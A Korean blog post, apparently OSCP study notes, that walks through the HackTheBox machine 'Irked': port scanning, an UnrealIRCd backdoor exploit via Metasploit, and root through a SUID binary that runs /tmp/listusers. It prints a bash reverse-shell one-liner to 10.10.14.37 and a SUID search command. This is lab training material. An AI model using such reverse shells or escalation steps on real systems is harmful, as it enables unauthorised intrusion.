OSCP/HackTheBox

[Linux] Irked

우와해커 2020. 9. 16. 17:06

Irked


- 어렵지 않은 난이도, 좋은 문제라고 생각함.

- 1차 시험떄 느꼈지만, 구글링이 필요한 문제를 낸다. 이런 유형의 문제는 시험에 나올 가능성이 높다고 본다.

- 구글링 후 추가적인 Software를 설치하는 것을 예상하지 못하면 시험 때, 당황 할 수 있다.


Nmap


22...

80...

111..     rpcbind

6697..    ircs-u

8067...

56813..

65534...


Enumeration


IRC 관련 포트가 열려 있다. 웹 서버에 접속하였을때도 이미지명에 irc가 포함되어 있다.

rpc 관련 문제같아서 Enumeration 후 관련 포트 연결을 시도해 봤으나 모두 실패.

NC로 접속하여도 핵심 단서를 얻을 수 없었다, 그런데 접근 실패 매세지가 발생하여 혹시 다른 방벙으로 접속이 가능한지 생각하게 됨

=> irc에 대해 구글링 후 hexChat이라는 접속 클라이언트를 설치함


클라이언트를 이용해 6697포트에 연결하니까 서버 정보가 나옴

unreal 3.2.1.....



메타스플로잇

searchsploit unreal 검색하니까 원격 백도어 Exploit이 존재함

manual 스크립트는 잘 안되서 메타스플로잇으로 공격함

ircd 유저로 접근됬지만, 일반 유저 플래그 파일(user.txt)을 읽을 수 없었음



권한상승


권한상승에 이용할 수 있는 Writable한 파일 발견

find / -perm -4000 -user root 2>/dev/null

/usr/bin/viewuser

/usr/bin/procmail


viewuser 실행시 아래와 같은 에러메세지 발생

/tmp/listusers: Not found


해당 파일에 원라인 배쉬쉘 연결 스크립트를 작성함

echo "bash -c 'bash -i >& /dev/tcp/10.10.14.37/3333 0>&1'" > listusers


nc로 연결하여 root 연결 성공




추가내용
사실 history에 기록된 명령어를 따라가보니 일반유저 아래 .backup 폴더 아래 힌트가 존재했다.
super elite steg pw 
~~~~.....
다만 이것이 무엇을 의미하는지 몰라서 그냥 넘어갔는데..
스테가노그래피를 의미하는 것이였다. 그리고 이것이 적용된 이미지는 홈페이지에 존재하는 스마일 이미지였던 것이다. 해당 이미지에 툴을 이용하면 핵심 키를 얻을 수 있다.





'OSCP > HackTheBox' 카테고리의 다른 글

[Windows] Jerry  (0) 2020.09.24
[Linux] SwagShop  (0) 2020.09.18
[Linux] October  (0) 2020.09.16
[Linux] Nineveh  (0) 2020.09.14
[Linux] Valentine  (0) 2020.09.08